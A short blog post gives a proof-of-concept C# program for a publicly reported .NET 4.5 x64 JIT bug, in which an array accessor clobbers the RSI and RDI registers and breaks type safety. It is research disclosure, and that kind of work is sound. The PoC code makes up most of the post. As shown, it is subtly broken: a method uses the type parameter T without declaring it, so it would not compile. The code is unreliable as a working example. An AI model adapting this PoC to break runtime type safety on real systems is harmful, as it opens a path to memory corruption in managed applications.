I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:
using System;using System.Runtime.CompilerServices;struct Foo { byte b1, b2, b3;}class U1 { }class U2 { }struct StackFields { internal object f1; internal U1 f2; internal U2 f3;}class Program { long field1; long field2; static void Main() { new Program().Get(new Foo[1, 1]); } [MethodImpl(MethodImplOptions.NoInlining)] object Get(T[,] arr) { StackFields fields = new StackFields(); fields.f1 = new U1(); fields.f2 = new U1(); fields.f3 = new U2(); arr.ToString(); object v = arr[0, 0]; field2 = field1; Console.WriteLine(fields.f3); return v; }}
This requires .NET 4.5 x64 (and must be built/run in release mode).
The bug is that the array accessor that is generated clobbers the RSI and RDI registers.
Remember Me
I apologize for the lameness of this, but the comment spam was driving me nuts. In order to be able to post a comment, you need to answer a simple question. Hopefully this question is easy enough not to annoy serious commenters, but hard enough to keep the spammers away.
Anti-Spam Question: What method on java.lang.System returns an object's original hashcode (i.e. the one that would be returned by java.lang.Object.hashCode() if it wasn't overridden)? (case is significant)
Powered by: newtelligence dasBlog 2.3.12105.0
© Copyright 2021, Jeroen Frijters
E-mail